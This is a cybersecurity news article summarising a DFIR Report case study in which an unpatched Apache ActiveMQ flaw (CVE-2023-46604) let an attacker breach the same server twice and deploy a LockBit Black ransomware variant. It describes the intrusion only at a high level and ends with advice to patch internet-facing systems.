Unpatched ActiveMQ Flaw Leads to Repeat Breach and LockBit Ransomware

In the world of cybersecurity, “eviction” is rarely the end of the story. A new case study from The DFIR Report reveals how a persistent threat actor exploited a critical vulnerability in Apache ActiveMQ to breach a corporate network not once, but twice, ultimately deploying LockBit ransomware after being initially kicked out.

The intrusion began in mid-February 2024 when an attacker targeted an internet-facing Apache ActiveMQ server. The vulnerability used, tracked as CVE-2023-46604, is a critical remote code execution (RCE) flaw that has become a favorite for ransomware operators.

“The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file,” the report details. Using the Windows CertUtil utility, the malicious XML file downloaded a payload from a remote server, giving the attacker their first foothold.

While the organization’s security team identified and evicted the intruder after the first attempt, they failed to seal the vulnerability.

“Despite being evicted after the initial intrusion, they successfully breached the same server on a second occasion 18 days later,” the researchers observed. This second entry was the beginning of a rapid escalation.

Armed with a fresh connection, the actor utilized Metasploit and Meterpreter to burrow deeper into the environment. They successfully escalated privileges, accessed LSASS process memory to harvest credentials, and moved laterally across the network.

With the network mapped and credentials in hand, the threat actor “swiftly transitioned to deploying ransomware”. Using the Remote Desktop Protocol (RDP) and the stolen credentials, they distributed the encryption payload across the environment.

The ransomware used was a variant of LockBit Black (also known as LockBit 3.0). Interestingly, the investigators concluded that this was likely an independent operator rather than the core LockBit group. “The ransom note did not follow the normal LockBit format directing victims to a Tor leak site or TOX/Jabber communications; instead, it instructed them to download and use the Session private messaging application,” the report notes.

This led researchers to assess that the activity was “conducted by an independent threat actor using the leaked builder to operate their own ransomware campaign”.

The attackers attempted to soften the blow with a surprisingly professional. “Compared to other ransomware we charge a lot less, so don’t be stingy!” the note read. They even offered a “security audit” as part of the payment package: “We will also let you know about the vulnerability in your servers that we used to infiltrate your network. We work honesty!”.

While the threat actor was “evicted,” the root cause—the unpatched Apache ActiveMQ server—allowed for an identical re-entry less than three weeks later. Organizations are urged to prioritize the patching of internet-facing applications and to treat every “eviction” as a temporary measure until the vulnerability is permanently closed.